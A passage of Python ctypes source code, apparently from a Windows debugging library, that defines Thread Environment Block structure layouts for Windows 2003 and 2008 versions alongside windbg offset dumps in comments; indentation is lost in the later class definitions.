# +0xf64 SubProcessTag : Ptr32 Void
# +0xf68 EtwTraceData : Ptr32 Void
# +0xf6c WinSockData : Ptr32 Void
# +0xf70 GdiBatchCount : Uint4B
# +0xf74 InDbgPrint : UChar
# +0xf75 FreeStackOnTermination : UChar
# +0xf76 HasFiberData : UChar
# +0xf77 IdealProcessor : UChar
# +0xf78 GuaranteedStackBytes : Uint4B
# +0xf7c ReservedForPerf : Ptr32 Void
# +0xf80 ReservedForOle : Ptr32 Void
# +0xf84 WaitingOnLoaderLock : Uint4B
# +0xf88 SparePointer1 : Uint4B
# +0xf8c SoftPatchPtr1 : Uint4B
# +0xf90 SoftPatchPtr2 : Uint4B
# +0xf94 TlsExpansionSlots : Ptr32 Ptr32 Void
# +0xf98 ImpersonationLocale : Uint4B
# +0xf9c IsImpersonating : Uint4B
# +0xfa0 NlsCache : Ptr32 Void
# +0xfa4 pShimData : Ptr32 Void
# +0xfa8 HeapVirtualAffinity : Uint4B
# +0xfac CurrentTransactionHandle : Ptr32 Void
# +0xfb0 ActiveFrame : Ptr32 _TEB_ACTIVE_FRAME
# +0xfb4 FlsData : Ptr32 Void
# +0xfb8 SafeThunkCall : UChar
# +0xfb9 BooleanSpare : [3] UChar
class _TEB_2003(Structure):
    """
    Thread Environment Block for 32 bit Windows 2003.

    Field order and types follow the windbg "dt _TEB" dump in the
    comments above (note SpareBytes1 is 40 bytes here and there is
    no TxFsContext member); do not reorder.
    """
    _pack_ = 8
    _fields_ = [
        ("NtTib", NT_TIB),
        ("EnvironmentPointer", PVOID),
        ("ClientId", CLIENT_ID),
        ("ActiveRpcHandle", HANDLE),
        ("ThreadLocalStoragePointer", PVOID),
        ("ProcessEnvironmentBlock", PVOID),  # PPEB
        ("LastErrorValue", DWORD),
        ("CountOfOwnedCriticalSections", DWORD),
        ("CsrClientThread", PVOID),
        ("Win32ThreadInfo", PVOID),
        ("User32Reserved", DWORD * 26),
        ("UserReserved", DWORD * 5),
        ("WOW32Reserved", PVOID),  # ptr to wow64cpu!X86SwitchTo64BitMode
        ("CurrentLocale", DWORD),
        ("FpSoftwareStatusRegister", DWORD),
        ("SystemReserved1", PVOID * 54),
        ("ExceptionCode", SDWORD),
        ("ActivationContextStackPointer", PVOID),  # PACTIVATION_CONTEXT_STACK
        ("SpareBytes1", UCHAR * 40),
        ("GdiTebBatch", GDI_TEB_BATCH),
        ("RealClientId", CLIENT_ID),
        ("GdiCachedProcessHandle", HANDLE),
        ("GdiClientPID", DWORD),
        ("GdiClientTID", DWORD),
        ("GdiThreadLocalInfo", PVOID),
        ("Win32ClientInfo", DWORD * 62),
        ("glDispatchTable", PVOID * 233),
        ("glReserved1", DWORD * 29),
        ("glReserved2", PVOID),
        ("glSectionInfo", PVOID),
        ("glSection", PVOID),
        ("glTable", PVOID),
        ("glCurrentRC", PVOID),
        ("glContext", PVOID),
        ("LastStatusValue", NTSTATUS),
        ("StaticUnicodeString", UNICODE_STRING),
        ("StaticUnicodeBuffer", WCHAR * 261),
        ("DeallocationStack", PVOID),
        ("TlsSlots", PVOID * 64),
        ("TlsLinks", LIST_ENTRY),
        ("Vdm", PVOID),
        ("ReservedForNtRpc", PVOID),
        ("DbgSsReserved", PVOID * 2),
        ("HardErrorMode", DWORD),
        ("Instrumentation", PVOID * 14),
        ("SubProcessTag", PVOID),
        ("EtwTraceData", PVOID),
        ("WinSockData", PVOID),
        ("GdiBatchCount", DWORD),
        ("InDbgPrint", BOOLEAN),
        ("FreeStackOnTermination", BOOLEAN),
        ("HasFiberData", BOOLEAN),
        ("IdealProcessor", UCHAR),
        ("GuaranteedStackBytes", DWORD),
        ("ReservedForPerf", PVOID),
        ("ReservedForOle", PVOID),
        ("WaitingOnLoaderLock", DWORD),
        ("SparePointer1", PVOID),
        ("SoftPatchPtr1", PVOID),
        ("SoftPatchPtr2", PVOID),
        ("TlsExpansionSlots", PVOID),  # Ptr32 Ptr32 Void
        ("ImpersonationLocale", DWORD),
        ("IsImpersonating", BOOL),
        ("NlsCache", PVOID),
        ("pShimData", PVOID),
        ("HeapVirtualAffinity", DWORD),
        ("CurrentTransactionHandle", HANDLE),
        ("ActiveFrame", PVOID),  # PTEB_ACTIVE_FRAME
        ("FlsData", PVOID),
        ("SafeThunkCall", BOOLEAN),
        ("BooleanSpare", BOOLEAN * 3),
    ]
# Windows 2003 64 bit and 2003 R2 reuse the earlier TEB layouts.
_TEB_2003_64 = _TEB_XP_64
_TEB_2003_R2 = _TEB_2003
_TEB_2003_R2_64 = _TEB_2003_64
# +0x000 NtTib : _NT_TIB
# +0x01c EnvironmentPointer : Ptr32 Void
# +0x020 ClientId : _CLIENT_ID
# +0x028 ActiveRpcHandle : Ptr32 Void
# +0x02c ThreadLocalStoragePointer : Ptr32 Void
# +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
# +0x034 LastErrorValue : Uint4B
# +0x038 CountOfOwnedCriticalSections : Uint4B
# +0x03c CsrClientThread : Ptr32 Void
# +0x040 Win32ThreadInfo : Ptr32 Void
# +0x044 User32Reserved : [26] Uint4B
# +0x0ac UserReserved : [5] Uint4B
# +0x0c0 WOW32Reserved : Ptr32 Void
# +0x0c4 CurrentLocale : Uint4B
# +0x0c8 FpSoftwareStatusRegister : Uint4B
# +0x0cc SystemReserved1 : [54] Ptr32 Void
# +0x1a4 ExceptionCode : Int4B
# +0x1a8 ActivationContextStackPointer : Ptr32 _ACTIVATION_CONTEXT_STACK
# +0x1ac SpareBytes1 : [36] UChar
# +0x1d0 TxFsContext : Uint4B
# +0x1d4 GdiTebBatch : _GDI_TEB_BATCH
# +0x6b4 RealClientId : _CLIENT_ID
# +0x6bc GdiCachedProcessHandle : Ptr32 Void
# +0x6c0 GdiClientPID : Uint4B
# +0x6c4 GdiClientTID : Uint4B
# +0x6c8 GdiThreadLocalInfo : Ptr32 Void
# +0x6cc Win32ClientInfo : [62] Uint4B
# +0x7c4 glDispatchTable : [233] Ptr32 Void
# +0xb68 glReserved1 : [29] Uint4B
# +0xbdc glReserved2 : Ptr32 Void
# +0xbe0 glSectionInfo : Ptr32 Void
# +0xbe4 glSection : Ptr32 Void
# +0xbe8 glTable : Ptr32 Void
# +0xbec glCurrentRC : Ptr32 Void
# +0xbf0 glContext : Ptr32 Void
# +0xbf4 LastStatusValue : Uint4B
# +0xbf8 StaticUnicodeString : _UNICODE_STRING
# +0xc00 StaticUnicodeBuffer : [261] Wchar
# +0xe0c DeallocationStack : Ptr32 Void
# +0xe10 TlsSlots : [64] Ptr32 Void
# +0xf10 TlsLinks : _LIST_ENTRY
# +0xf18 Vdm : Ptr32 Void
# +0xf1c ReservedForNtRpc : Ptr32 Void
# +0xf20 DbgSsReserved : [2] Ptr32 Void
# +0xf28 HardErrorMode : Uint4B
# +0xf2c Instrumentation : [9] Ptr32 Void
# +0xf50 ActivityId : _GUID
# +0xf60 SubProcessTag : Ptr32 Void
# +0xf64 EtwLocalData : Ptr32 Void
# +0xf68 EtwTraceData : Ptr32 Void
# +0xf6c WinSockData : Ptr32 Void
# +0xf70 GdiBatchCount : Uint4B
# +0xf74 SpareBool0 : UChar
# +0xf75 SpareBool1 : UChar
# +0xf76 SpareBool2 : UChar
# +0xf77 IdealProcessor : UChar
# +0xf78 GuaranteedStackBytes : Uint4B
# +0xf7c ReservedForPerf : Ptr32 Void
# +0xf80 ReservedForOle : Ptr32 Void
# +0xf84 WaitingOnLoaderLock : Uint4B
# +0xf88 SavedPriorityState : Ptr32 Void
# +0xf8c SoftPatchPtr1 : Uint4B
# +0xf90 ThreadPoolData : Ptr32 Void
# +0xf94 TlsExpansionSlots : Ptr32 Ptr32 Void
# +0xf98 ImpersonationLocale : Uint4B
# +0xf9c IsImpersonating : Uint4B
# +0xfa0 NlsCache : Ptr32 Void
# +0xfa4 pShimData : Ptr32 Void
# +0xfa8 HeapVirtualAffinity : Uint4B
# +0xfac CurrentTransactionHandle : Ptr32 Void
# +0xfb0 ActiveFrame : Ptr32 _TEB_ACTIVE_FRAME
# +0xfb4 FlsData : Ptr32 Void
# +0xfb8 PreferredLanguages : Ptr32 Void
# +0xfbc UserPrefLanguages : Ptr32 Void
# +0xfc0 MergedPrefLanguages : Ptr32 Void
# +0xfc4 MuiImpersonation : Uint4B
# +0xfc8 CrossTebFlags : Uint2B
# +0xfc8 SpareCrossTebBits : Pos 0, 16 Bits
# +0xfca SameTebFlags : Uint2B
# +0xfca DbgSafeThunkCall : Pos 0, 1 Bit
# +0xfca DbgInDebugPrint : Pos 1, 1 Bit
# +0xfca DbgHasFiberData : Pos 2, 1 Bit
# +0xfca DbgSkipThreadAttach : Pos 3, 1 Bit
# +0xfca DbgWerInShipAssertCode : Pos 4, 1 Bit
# +0xfca DbgRanProcessInit : Pos 5, 1 Bit
# +0xfca DbgClonedThread : Pos 6, 1 Bit
# +0xfca DbgSuppressDebugMsg : Pos 7, 1 Bit
# +0xfca RtlDisableUserStackWalk : Pos 8, 1 Bit
# +0xfca RtlExceptionAttached : Pos 9, 1 Bit
# +0xfca SpareSameTebBits : Pos 10, 6 Bits
# +0xfcc TxnScopeEnterCallback : Ptr32 Void
# +0xfd0 TxnScopeExitCallback : Ptr32 Void
# +0xfd4 TxnScopeContext : Ptr32 Void
# +0xfd8 LockCount : Uint4B
# +0xfdc ProcessRundown : Uint4B
# +0xfe0 LastSwitchTime : Uint8B
# +0xfe8 TotalSwitchOutTime : Uint8B
# +0xff0 WaitReasonBitMap : _LARGE_INTEGER
class _TEB_2008(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes1", UCHAR * 36),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", DWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", DWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 9),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("SpareBool0", BOOLEAN),
("SpareBool1", BOOLEAN),
("SpareBool2", BOOLEAN),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SavedPriorityState", PVOID),
("SoftPatchPtr1", PVOID),
("ThreadPoolData", PVOID),
("TlsExpansionSlots", PVOID), # Ptr32 Ptr32 Void
("ImpersonationLocale", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("PreferredLanguages", PVOID),
("UserPrefLanguages", PVOID),
("MergedPrefLanguages", PVOID),
("MuiImpersonation", BOOL),
("CrossTebFlags", WORD),
("SameTebFlags", WORD),
("TxnScopeEnterCallback", PVOID),
("TxnScopeExitCallback", PVOID),
("TxnScopeContext", PVOID),
("LockCount", DWORD),
("ProcessRundown", DWORD),
("LastSwitchTime", QWORD),
("TotalSwitchOutTime", QWORD),
("WaitReasonBitMap", LONGLONG), # LARGE_INTEGER
]
# +0x000 NtTib : _NT_TIB
# +0x038 EnvironmentPointer : Ptr64 Void
# +0x040 ClientId : _CLIENT_ID
# +0x050 ActiveRpcHandle : Ptr64 Void
# +0x058 ThreadLocalStoragePointer : Ptr64 Void
# +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
# +0x068 LastErrorValue : Uint4B
# +0x06c CountOfOwnedCriticalSections : Uint4B
# +0x070 CsrClientThread : Ptr64 Void
# +0x078 Win32ThreadInfo : Ptr64 Void
# +0x080 User32Reserved : [26] Uint4B
# +0x0e8 UserReserved : [5] Uint4B
# +0x100 WOW32Reserved : Ptr64 Void
# +0x108 CurrentLocale : Uint4B
# +0x10c FpSoftwareStatusRegister : Uint4B
# +0x110 SystemReserved1 : [54] Ptr64 Void
# +0x2c0 ExceptionCode : Int4B
# +0x2c8 ActivationContextStackPointer : Ptr64 _ACTIVATION_CONTEXT_STACK
# +0x2d0 SpareBytes1 : [24] UChar
# +0x2e8 TxFsContext : Uint4B
# +0x2f0 GdiTebBatch : _GDI_TEB_BATCH
# +0x7d8 RealClientId : _CLIENT_ID
# +0x7e8 GdiCachedProcessHandle : Ptr64 Void
# +0x7f0 GdiClientPID : Uint4B
# +0x7f4 GdiClientTID : Uint4B
# +0x7f8 GdiThreadLocalInfo : Ptr64 Void
# +0x800 Win32ClientInfo : [62] Uint8B
# +0x9f0 glDispatchTable : [233] Ptr64 Void
# +0x1138 glReserved1 : [29] Uint8B
# +0x1220 glReserved2 : Ptr64 Void
# +0x1228 glSectionInfo : Ptr64 Void
# +0x1230 glSection : Ptr64 Void
# +0x1238 glTable : Ptr64 Void
# +0x1240 glCurrentRC : Ptr64 Void
# +0x1248 glContext : Ptr64 Void
# +0x1250 LastStatusValue : Uint4B
# +0x1258 StaticUnicodeString : _UNICODE_STRING
# +0x1268 StaticUnicodeBuffer : [261] Wchar
# +0x1478 DeallocationStack : Ptr64 Void
# +0x1480 TlsSlots : [64] Ptr64 Void
# +0x1680 TlsLinks : _LIST_ENTRY
# +0x1690 Vdm : Ptr64 Void
# +0x1698 ReservedForNtRpc : Ptr64 Void
# +0x16a0 DbgSsReserved : [2] Ptr64 Void
# +0x16b0 HardErrorMode : Uint4B
# +0x16b8 Instrumentation : [11] Ptr64 Void
# +0x1710 ActivityId : _GUID
# +0x1720 SubProcessTag : Ptr64 Void
# +0x1728 EtwLocalData : Ptr64 Void
# +0x1730 EtwTraceData : Ptr64 Void
# +0x1738 WinSockData : Ptr64 Void
# +0x1740 GdiBatchCount : Uint4B
# +0x1744 SpareBool0 : UChar
# +0x1745 SpareBool1 : UChar
# +0x1746 SpareBool2 : UChar
# +0x1747 IdealProcessor : UChar
# +0x1748 GuaranteedStackBytes : Uint4B
# +0x1750 ReservedForPerf : Ptr64 Void
# +0x1758 ReservedForOle : Ptr64 Void
# +0x1760 WaitingOnLoaderLock : Uint4B
# +0x1768 SavedPriorityState : Ptr64 Void
# +0x1770 SoftPatchPtr1 : Uint8B
# +0x1778 ThreadPoolData : Ptr64 Void
# +0x1780 TlsExpansionSlots : Ptr64 Ptr64 Void
# +0x1788 DeallocationBStore : Ptr64 Void
# +0x1790 BStoreLimit : Ptr64 Void
# +0x1798 ImpersonationLocale : Uint4B
# +0x179c IsImpersonating : Uint4B
# +0x17a0 NlsCache : Ptr64 Void
# +0x17a8 pShimData : Ptr64 Void
# +0x17b0 HeapVirtualAffinity : Uint4B
# +0x17b8 CurrentTransactionHandle : Ptr64 Void
# +0x17c0 ActiveFrame : Ptr64 _TEB_ACTIVE_FRAME
# +0x17c8 FlsData : Ptr64 Void
# +0x17d0 PreferredLanguages : Ptr64 Void
# +0x17d8 UserPrefLanguages : Ptr64 Void
# +0x17e0 MergedPrefLanguages : Ptr64 Void
# +0x17e8 MuiImpersonation : Uint4B
# +0x17ec CrossTebFlags : Uint2B
# +0x17ec SpareCrossTebBits : Pos 0, 16 Bits
# +0x17ee SameTebFlags : Uint2B
# +0x17ee DbgSafeThunkCall : Pos 0, 1 Bit
# +0x17ee DbgInDebugPrint : Pos 1, 1 Bit
# +0x17ee DbgHasFiberData : Pos 2, 1 Bit
# +0x17ee DbgSkipThreadAttach : Pos 3, 1 Bit
# +0x17ee DbgWerInShipAssertCode : Pos 4, 1 Bit
# +0x17ee DbgRanProcessInit : Pos 5, 1 Bit
# +0x17ee DbgClonedThread : Pos 6, 1 Bit
# +0x17ee DbgSuppressDebugMsg : Pos 7, 1 Bit
# +0x17ee RtlDisableUserStackWalk : Pos 8, 1 Bit
# +0x17ee RtlExceptionAttached : Pos 9, 1 Bit
# +0x17ee SpareSameTebBits : Pos 10, 6 Bits
# +0x17f0 TxnScopeEnterCallback : Ptr64 Void
# +0x17f8 TxnScopeExitCallback : Ptr64 Void
# +0x1800 TxnScopeContext : Ptr64 Void
# +0x1808 LockCount : Uint4B
# +0x180c ProcessRundown : Uint4B
# +0x1810 LastSwitchTime : Uint8B
# +0x1818 TotalSwitchOutTime : Uint8B
# +0x1820 WaitReasonBitMap : _LARGE_INTEGER
class _TEB_2008_64(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes1", UCHAR * 24),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", QWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", QWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 11),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("SpareBool0", BOOLEAN),
("SpareBool1", BOOLEAN),
("SpareBool2", BOOLEAN),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SavedPriorityState", PVOID),
("SoftPatchPtr1", PVOID),
("ThreadPoolData", PVOID),
("TlsExpansionSlots", PVOID), # Ptr64 Ptr64 Void
("DeallocationBStore", PVOID),
("BStoreLimit", PVOID),
("ImpersonationLocale", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("PreferredLanguages", PVOID),
("UserPrefLanguages", PVOID),
("MergedPrefLanguages", PVOID),
("MuiImpersonation", BOOL),
("CrossTebFlags", WORD),
("SameTebFlags", WORD),
("TxnScopeEnterCallback", PVOID),
("TxnScopeExitCallback", PVOID),
("TxnScopeContext", PVOID),
("LockCount", DWORD),
("ProcessRundown", DWORD),
("LastSwitchTime", QWORD),
("TotalSwitchOutTime", QWORD),
("WaitReasonBitMap", LONGLONG), # LARGE_INTEGER
]
# +0x000 NtTib : _NT_TIB
# +0x01c EnvironmentPointer : Ptr32 Void
# +0x020 ClientId : _CLIENT_ID
# +0x028 ActiveRpcHandle : Ptr32 Void
# +0x02c ThreadLocalStoragePointer : Ptr32 Void
# +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
# +0x034 LastErrorValue : Uint4B
# +0x038 CountOfOwnedCriticalSections : Uint4B
# +0x03c CsrClientThread : Ptr32 Void
# +0x040 Win32ThreadInfo : Ptr32 Void
# +0x044 User32Reserved : [26] Uint4B
# +0x0ac UserReserved : [5] Uint4B
# +0x0c0 WOW32Reserved : Ptr32 Void
# +0x0c4 CurrentLocale : Uint4B
# +0x0c8 FpSoftwareStatusRegister : Uint4B
# +0x0cc SystemReserved1 : [54] Ptr32 Void
# +0x1a4 ExceptionCode : Int4B
# +0x1a8 ActivationContextStackPointer : Ptr32 _ACTIVATION_CONTEXT_STACK
# +0x1ac SpareBytes : [36] UChar
# +0x1d0 TxFsContext : Uint4B
# +0x1d4 GdiTebBatch : _GDI_TEB_BATCH
# +0x6b4 RealClientId : _CLIENT_ID
# +0x6bc GdiCachedProcessHandle : Ptr32 Void
# +0x6c0 GdiClientPID : Uint4B
# +0x6c4 GdiClientTID : Uint4B
# +0x6c8 GdiThreadLocalInfo : Ptr32 Void
# +0x6cc Win32ClientInfo : [62] Uint4B
# +0x7c4 glDispatchTable : [233] Ptr32 Void
# +0xb68 glReserved1 : [29] Uint4B
# +0xbdc glReserved2 : Ptr32 Void
# +0xbe0 glSectionInfo : Ptr32 Void
# +0xbe4 glSection : Ptr32 Void
# +0xbe8 glTable : Ptr32 Void
# +0xbec glCurrentRC : Ptr32 Void
# +0xbf0 glContext : Ptr32 Void
# +0xbf4 LastStatusValue : Uint4B
# +0xbf8 StaticUnicodeString : _UNICODE_STRING
# +0xc00 StaticUnicodeBuffer : [261] Wchar
# +0xe0c DeallocationStack : Ptr32 Void
# +0xe10 TlsSlots : [64] Ptr32 Void
# +0xf10 TlsLinks : _LIST_ENTRY
# +0xf18 Vdm : Ptr32 Void
# +0xf1c ReservedForNtRpc : Ptr32 Void
# +0xf20 DbgSsReserved : [2] Ptr32 Void
# +0xf28 HardErrorMode : Uint4B
# +0xf2c Instrumentation : [9] Ptr32 Void
# +0xf50 ActivityId : _GUID
# +0xf60 SubProcessTag : Ptr32 Void
# +0xf64 EtwLocalData : Ptr32 Void
# +0xf68 EtwTraceData : Ptr32 Void
# +0xf6c WinSockData : Ptr32 Void
# +0xf70 GdiBatchCount : Uint4B
# +0xf74 CurrentIdealProcessor : _PROCESSOR_NUMBER
# +0xf74 IdealProcessorValue : Uint4B
# +0xf74 ReservedPad0 : UChar
# +0xf75 ReservedPad1 : UChar
# +0xf76 ReservedPad2 : UChar
# +0xf77 IdealProcessor : UChar
# +0xf78 GuaranteedStackBytes : Uint4B
# +0xf7c ReservedForPerf : Ptr32 Void
# +0xf80 ReservedForOle : Ptr32 Void
# +0xf84 WaitingOnLoaderLock : Uint4B
# +0xf88 SavedPriorityState : Ptr32 Void
# +0xf8c SoftPatchPtr1 : Uint4B
# +0xf90 ThreadPoolData : Ptr32 Void
# +0xf94 TlsExpansionSlots : Ptr32 Ptr32 Void
# +0xf98 MuiGeneration : Uint4B
# +0xf9c IsImpersonating : Uint4B
# +0xfa0 NlsCache : Ptr32 Void
# +0xfa4 pShimData : Ptr32 Void
# +0xfa8 HeapVirtualAffinity : Uint4B
# +0xfac CurrentTransactionHandle : Ptr32 Void
# +0xfb0 ActiveFrame : Ptr32 _TEB_ACTIVE_FRAME
# +0xfb4 FlsData : Ptr32 Void
# +0xfb8 PreferredLanguages : Ptr32 Void
# +0xfbc UserPrefLanguages : Ptr32 Void
# +0xfc0 MergedPrefLanguages : Ptr32 Void
# +0xfc4 MuiImpersonation : Uint4B
# +0xfc8 CrossTebFlags : Uint2B
# +0xfc8 SpareCrossTebBits : Pos 0, 16 Bits
# +0xfca SameTebFlags : Uint2B
# +0xfca SafeThunkCall : Pos 0, 1 Bit
# +0xfca InDebugPrint : Pos 1, 1 Bit
# +0xfca HasFiberData : Pos 2, 1 Bit
# +0xfca SkipThreadAttach : Pos 3, 1 Bit
# +0xfca WerInShipAssertCode : Pos 4, 1 Bit
# +0xfca RanProcessInit : Pos 5, 1 Bit
# +0xfca ClonedThread : Pos 6, 1 Bit
# +0xfca SuppressDebugMsg : Pos 7, 1 Bit
# +0xfca DisableUserStackWalk : Pos 8, 1 Bit
# +0xfca RtlExceptionAttached : Pos 9, 1 Bit
# +0xfca InitialThread : Pos 10, 1 Bit
# +0xfca SpareSameTebBits : Pos 11, 5 Bits
# +0xfcc TxnScopeEnterCallback : Ptr32 Void
# +0xfd0 TxnScopeExitCallback : Ptr32 Void
# +0xfd4 TxnScopeContext : Ptr32 Void
# +0xfd8 LockCount : Uint4B
# +0xfdc SpareUlong0 : Uint4B
# +0xfe0 ResourceRetValue : Ptr32 Void
class _TEB_2008_R2(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes", UCHAR * 36),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", DWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", DWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 9),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("CurrentIdealProcessor", PROCESSOR_NUMBER),
("IdealProcessorValue", DWORD),
("ReservedPad0", UCHAR),
("ReservedPad1", UCHAR),
("ReservedPad2", UCHAR),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SavedPriorityState", PVOID),
("SoftPatchPtr1", PVOID),
("ThreadPoolData", PVOID),
("TlsExpansionSlots", PVOID), # Ptr32 Ptr32 Void
("MuiGeneration", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("PreferredLanguages", PVOID),
("UserPrefLanguages", PVOID),
("MergedPrefLanguages", PVOID),
("MuiImpersonation", BOOL),
("CrossTebFlags", WORD),
("SameTebFlags", WORD),
("TxnScopeEnterCallback", PVOID),
("TxnScopeExitCallback", PVOID),
("TxnScopeContext", PVOID),
("LockCount", DWORD),
("SpareUlong0", ULONG),
("ResourceRetValue", PVOID),
]
# +0x000 NtTib : _NT_TIB
# +0x038 EnvironmentPointer : Ptr64 Void
# +0x040 ClientId : _CLIENT_ID
# +0x050 ActiveRpcHandle : Ptr64 Void
# +0x058 ThreadLocalStoragePointer : Ptr64 Void
# +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
# +0x068 LastErrorValue : Uint4B
# +0x06c CountOfOwnedCriticalSections : Uint4B
# +0x070 CsrClientThread : Ptr64 Void
# +0x078 Win32ThreadInfo : Ptr64 Void
# +0x080 User32Reserved : [26] Uint4B
# +0x0e8 UserReserved : [5] Uint4B
# +0x100 WOW32Reserved : Ptr64 Void
# +0x108 CurrentLocale : Uint4B
# +0x10c FpSoftwareStatusRegister : Uint4B
# +0x110 SystemReserved1 : [54] Ptr64 Void
# +0x2c0 ExceptionCode : Int4B
# +0x2c8 ActivationContextStackPointer : Ptr64 _ACTIVATION_CONTEXT_STACK
# +0x2d0 SpareBytes : [24] UChar
